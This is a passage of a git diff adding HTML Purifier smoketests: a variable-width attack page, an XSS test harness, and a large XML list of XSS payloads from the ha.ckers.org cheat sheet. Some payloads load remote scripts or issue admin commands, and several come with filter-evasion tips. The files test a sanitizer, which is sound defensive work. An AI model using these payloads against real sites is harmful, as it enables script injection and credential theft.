+TYPE: text +DEFAULT: "Case sensitive\nand\npossibly\nquite long..." +DESCRIPTION: The text type has newlines and is case-sensitive. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/test-schema/Type.txt b/lib/htmlpurifier/smoketests/test-schema/Type.txt new file mode 100644 index 000000000..b4761220c --- /dev/null +++ b/lib/htmlpurifier/smoketests/test-schema/Type.txt @@ -0,0 +1,3 @@ +Type +DESCRIPTION: Directives demonstration the variable types ConfigSchema supports. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/test-schema/info.ini b/lib/htmlpurifier/smoketests/test-schema/info.ini new file mode 100644 index 000000000..438e8acce --- /dev/null +++ b/lib/htmlpurifier/smoketests/test-schema/info.ini @@ -0,0 +1,3 @@ +name = "Test Schema" + +; vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/variableWidthAttack.php b/lib/htmlpurifier/smoketests/variableWidthAttack.php new file mode 100644 index 000000000..f3b6e8214 --- /dev/null +++ b/lib/htmlpurifier/smoketests/variableWidthAttack.php @@ -0,0 +1,57 @@ +<?php + +require_once 'common.php'; + +echo '<?xml version="1.0" encoding="UTF-8" ?>'; +?><!DOCTYPE html + PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<html> +<head> + <title>HTML Purifier Variable Width Attack Smoketest</title> + <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> +</head> +<body> +<h1>HTML Purifier Variable Width Attack Smoketest</h1> +<p>For more information, see +<a href="http://applesoup.googlepages.com/bypass_filter.txt">Cheng Peng Su's +original advisory.</a> This particular exploit code appears only to work +in Internet Explorer, if it works at all.</p> +<h2>Test</h2> +<?php + +$purifier = new HTMLPurifier(); + +?> +<table> +<thead><tr><th>ASCII</th><th width="30%">Raw</th><th>Output</th><th>Render</th></tr></thead> +<tbody> +<?php + +for ($i = 0; $i < 256; $i++) { + $c = chr($i); + $html = '<img src="" alt="X' . $c . '"'; + $html .= '>A"'; // in our out the attribute? ;-) + $html .= "onerror=alert('$i')>O"; + $pure_html = $purifier->purify($html); +?> +<tr> + <td><?php echo $i; ?></td> + <td style="font-size:8pt;"><?php echo escapeHTML($html); ?></td> + <td style="font-size:8pt;"><?php echo escapeHTML($pure_html); ?></td> + <td><?php echo $pure_html; ?></td> +</tr> +<?php } ?> +</tbody> +</table> + +<h2>Analysis</h2> + +<p>By making sure that UTF-8 is well formed and non-SGML codepoints are +removed, as well as escaping quotes outside of tags, this is a non-threat.</p> + +</body> +</html> +<?php + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/xssAttacks.php b/lib/htmlpurifier/smoketests/xssAttacks.php new file mode 100644 index 000000000..2a4dd5e6e --- /dev/null +++ b/lib/htmlpurifier/smoketests/xssAttacks.php @@ -0,0 +1,99 @@ +<?php + +require_once('common.php'); + +function formatCode($string) { + return + str_replace( + array("\t", '»', '\0(null)'), + array('<strong>\t</strong>', '<span class="linebreak">»</span>', '<strong>\0</strong>'), + escapeHTML( + str_replace("\0", '\0(null)', + wordwrap($string, 28, " »\n", true) + ) + ) + ); +} + +?><!DOCTYPE html + PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<html> +<head> + <title>HTML Purifier XSS Attacks Smoketest</title> + <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> + <style type="text/css"> + .scroll {overflow:auto; width:100%;} + .even {background:#EAEAEA;} + thead th {border-bottom:1px solid #000;} + pre strong {color:#00C;} + pre .linebreak {color:#AAA;font-weight:100;} + </style> +</head> +<body> +<h1>HTML Purifier XSS Attacks Smoketest</h1> +<p>XSS attacks are from +<a href="http://ha.ckers.org/xss.html">http://ha.ckers.org/xss.html</a>.</p> +<p><strong>Caveats:</strong> +<tt>Google.com</tt> has been programatically disallowed, but as you can +see, there are ways of getting around that, so coverage in this area +is not complete. Most XSS broadcasts its presence by spawning an alert dialogue. +The displayed code is not strictly correct, as linebreaks have been forced for +readability. Linewraps have been marked with <tt>»</tt>. Some tests are +omitted for your convenience. Not all control characters are displayed.</p> + +<h2>Test</h2> +<?php + +if (version_compare(PHP_VERSION, '5', '<')) exit('<p>Requires PHP 5.</p>'); + +$xml = simplexml_load_file('xssAttacks.xml'); + +// programatically disallow google.com for URI evasion tests +// not complete +$config = HTMLPurifier_Config::createDefault(); +$config->set('URI.HostBlacklist', array('google.com')); +$purifier = new HTMLPurifier($config); + +?> +<table cellspacing="0" cellpadding="2"> +<thead><tr><th>Name</th><th width="30%">Raw</th><th>Output</th><th>Render</th></tr></thead> +<tbody> +<?php + +$i = 0; +foreach ($xml->attack as $attack) { + $code = $attack->code; + + // custom code for null byte injection tests + if (substr($code, 0, 7) == 'perl -e') { + $code = substr($code, $i=strpos($code, '"')+1, strrpos($code, '"') - $i); + $code = str_replace('\0', "\0", $code); + } + + // disable vectors we cannot test in any meaningful way + if ($code == 'See Below') continue; // event handlers, whitelist defeats + if ($attack->name == 'OBJECT w/Flash 2') continue; // requires ActionScript + if ($attack->name == 'IMG Embedded commands 2') continue; // is an HTTP response + + // custom code for US-ASCII, which couldn't be expressed in XML without encoding + if ($attack->name == 'US-ASCII encoding') $code = urldecode($code); +?> + <tr<?php if ($i++ % 2) {echo ' class="even"';} ?>> + <td><?php echo escapeHTML($attack->name); ?></td> + <td><pre><?php echo formatCode($code); ?></pre></td> + <?php $pure_html = $purifier->purify($code); ?> + <td><pre><?php echo formatCode($pure_html); ?></pre></td> + <td><div class="scroll"><?php echo $pure_html ?></div></td> + </tr> +<?php +} + +?> +</tbody> +</table> +</body> +</html> +<?php + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/xssAttacks.xml b/lib/htmlpurifier/smoketests/xssAttacks.xml new file mode 100644 index 000000000..df741b6d3 --- /dev/null +++ b/lib/htmlpurifier/smoketests/xssAttacks.xml @@ -0,0 +1,1307 @@ +<?xml version="1.0"?> +<xss> + <attack> + <name>XSS Locator</name> + <code>';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}</code> + + <desc>Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. You'll need to replace the "&" with "%26" if you are submitting this XSS string via HTTP GET or it will be ignored and everything after it will be interpreted as another variable. Tip: If you're in a rush and need to quickly check a page, often times injecting the deprecated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably.</desc> + <label>Basic XSS Attacks</label> + + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>XSS Quick Test</name> + <code>'';!--"<XSS>=&{()}</code> + <desc>If you don't have much space, this string is a nice compact XSS injection check. View source after injecting it and look for <XSS versus &lt;XSS to see if it is vulnerable.</desc> + + <label>Basic XSS Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>SCRIPT w/Alert()</name> + <code><SCRIPT>alert('XSS')</SCRIPT></code> + <desc>Basic injection attack</desc> + + <label>Basic XSS Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>SCRIPT w/Source File</name> + <code><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT></code> + <desc>No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here).</desc> + <label>Basic XSS Attacks</label> + + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>SCRIPT w/Char Code</name> + <code><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT></code> + <desc>Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up.</desc> + + <label>Basic XSS Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>BASE</name> + <code><BASE HREF="javascript:alert('XSS');//"></code> + <desc>Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work</desc> + + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>BGSOUND</name> + <code><BGSOUND SRC="javascript:alert('XSS');"></code> + <desc>BGSOUND</desc> + <label>HTML Element Attacks</label> + + <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>BODY background-image</name> + <code><BODY BACKGROUND="javascript:alert('XSS');"></code> + <desc>BODY image</desc> + <label>HTML Element Attacks</label> + + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>BODY ONLOAD</name> + <code><BODY ONLOAD=alert('XSS')></code> + <desc>BODY tag (I like this method because it doesn't require using any variants of "javascript:" or "<SCRIPT..." to accomplish the XSS attack)</desc> + + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>DIV background-image 1</name> + <code><DIV STYLE="background-image: url(javascript:alert('XSS'))"></code> + <desc>Div background-image</desc> + <label>HTML Element Attacks</label> + + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>DIV background-image 2</name> + <code><DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"></code> + <desc>Div background-image plus extra characters. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8203, 12288, 65279)</desc> + + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>DIV expression</name> + <code><DIV STYLE="width: expression(alert('XSS'));"></code> + <desc>Div expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression"</desc> + + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>FRAME</name> + <code><FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET></code> + <desc>Frame (Frames have the same sorts of XSS problems as iframes).</desc> + + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>IFRAME</name> + <code><IFRAME SRC="javascript:alert('XSS');"></IFRAME></code> + <desc>Iframe (If iframes are allowed there are a lot of other XSS problems as well).</desc> + + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>INPUT Image</name> + <code><INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"></code> + <desc>INPUT Image</desc> + + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + </attack> + + <attack> + <name>IMG w/JavaScript Directive</name> + <code><IMG SRC="javascript:alert('XSS');"></code> + <desc>Image XSS using the JavaScript directive.</desc> + <label>HTML Element Attacks</label> + + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>IMG No Quotes/Semicolon</name> + <code><IMG SRC=javascript:alert('XSS')></code> + <desc>No quotes and no semicolon</desc> + <label>HTML Element Attacks</label> + + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>IMG Dynsrc</name> + <code><IMG DYNSRC="javascript:alert('XSS');"></code> + <desc>IMG Dynsrc</desc> + <label>HTML Element Attacks</label> + + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>IMG Lowsrc</name> + <code><IMG LOWSRC="javascript:alert('XSS');"></code> + <desc>IMG Lowsrc</desc> + <label>HTML Element Attacks</label> + + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>IMG Embedded commands 1</name> + <code><IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"></code> + <desc>This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc... This is one of the lesser used but more useful XSS vectors.</desc> + <label>HTML Element Attacks</label> + + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>IMG Embedded commands 2</name> + <code>Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser</code> + <desc>IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC="http://badguy.com/a.jpg"> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this).</desc> + + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>IMG STYLE w/expression</name> + <code>exp/*<XSS STYLE='no\xss:noxss("*//*"); +xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'></code> + + <desc>IMG STYLE with expression (this is really a hybrid of several CSS XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like the other CSS examples this can send IE into a loop).</desc> + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>List-style-image</name> + <code><STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</code> + + <desc>Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector.</desc> + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>IMG w/VBscript</name> + <code><IMG SRC='vbscript:msgbox("XSS")'></code> + <desc>VBscript in an image</desc> + <label>HTML Element Attacks</label> + + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>LAYER</name> + <code><LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER></code> + <desc>Layer (Older Netscape only)</desc> + <label>HTML Element Attacks</label> + + <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser> + + </attack> + <attack> + <name>Livescript</name> + <code><IMG SRC="livescript:[code]"></code> + <desc>Livescript (Older Netscape only)</desc> + <label>HTML Element Attacks</label> + + <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser> + + </attack> + <attack> + <name>US-ASCII encoding</name> + <code>%BCscript%BEalert(%A2XSS%A2)%BC/script%BE</code> + <desc>Found by Kurt Huwig http://www.iku-ag.de/ This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the hosts transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.</desc> + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="ns">NS4</span>]</browser> + + </attack> + <attack> + <name>META</name> + <code><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"></code> + <desc>The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs.</desc> + + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>META w/data:URL</name> + <code><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"></code> + <desc>This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, since it utilizes base64 encoding. Please see http://www.ietf.org/rfc/rfc2397.txt for more details</desc> + + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>META w/additional URL parameter</name> + <code><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"></code> + <desc>Meta with additional URL parameter. If the target website attempts to see if the URL contains an "http://" you can evade it with the following technique (Submitted by Moritz Naumann http://www.moritz-naumann.com)</desc> + + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>Mocha</name> + <code><IMG SRC="mocha:[code]"></code> + <desc>Mocha (Older Netscape only)</desc> + <label>HTML Element Attacks</label> + + <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser> + + </attack> + <attack> + <name>OBJECT</name> + <code><OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT></code> + <desc>If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag. The linked file is actually an HTML file that can contain your XSS</desc> + + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>OBJECT w/Embedded XSS</name> + <code><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT></code> + <desc>Using an OBJECT tag you can embed XSS directly (this is unverified).</desc> + + <label>HTML Element Attacks</label> + <browser>Browser support:</browser> + </attack> + <attack> + <name>Embed Flash</name> + <code><EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED></code> + + <desc>Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info). Demo: http://ha.ckers.org/weird/xssflash.html :</desc> + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>OBJECT w/Flash 2</name> + <code>a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")"; eval(a+b+c+d);</code> + + <desc>Using this action script inside flash can obfuscate your XSS vector.</desc> + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>STYLE</name> + <code><STYLE TYPE="text/javascript">alert('XSS');</STYLE></code> + <desc>STYLE tag (Older versions of Netscape only)</desc> + + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser> + + </attack> + <attack> + <name>STYLE w/Comment</name> + <code><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"></code> + <desc>STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one)</desc> + <label>HTML Element Attacks</label> + + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>STYLE w/Anonymous HTML</name> + <code><XSS STYLE="xss:expression(alert('XSS'))"></code> + <desc>Anonymous HTML with STYLE attribute (IE and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter)</desc> + + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>STYLE w/background-image</name> + <code><STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A></code> + + <desc>STYLE tag using background-image.</desc> + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>STYLE w/background</name> + <code><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE></code> + + <desc>STYLE tag using background.</desc> + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>Stylesheet</name> + <code><LINK REL="stylesheet" HREF="javascript:alert('XSS');"></code> + <desc>Stylesheet</desc> + + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Remote Stylesheet 1</name> + <code><LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"></code> + <desc>Remote style sheet (using something as simple as a remote style sheet you can include your XSS as the style question redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page.</desc> + + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Remote Stylesheet 2</name> + <code><STYLE>@import'http://ha.ckers.org/xss.css';</STYLE></code> + <desc>Remote style sheet part 2 (this works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop http://www.hacker.co.il/security/ie/css_import.html. As a side note you can remote the end STYLE tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equal sign or a slash in your cross site scripting attack, which has come up at least once in the real world.</desc> + + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Remote Stylesheet 3</name> + <code><META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"></code> + <desc>Remote style sheet part 3. This only works in Opera but is fairly tricky. Setting a link header is not part of the HTTP1.1 spec. However, some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://ha.ckers.org/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox.</desc> + + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Remote Stylesheet 4</name> + <code><STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE></code> + <desc>Remote style sheet part 4. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites.</desc> + + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>TABLE</name> + <code><TABLE BACKGROUND="javascript:alert('XSS')"></TABLE></code> + <desc>Table background (who would have thought tables were XSS targets... except me, of course).</desc> + + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>TD</name> + <code><TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE></code> + <desc>TD background.</desc> + + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>XML namespace</name> + <code><HTML xmlns:xss> +<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> +<xss:xss>XSS</xss:xss> + +</HTML></code> + <desc>XML namespace. The .htc file must be located on the server as your XSS vector.</desc> + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>XML data island w/CDATA</name> + <code><XML 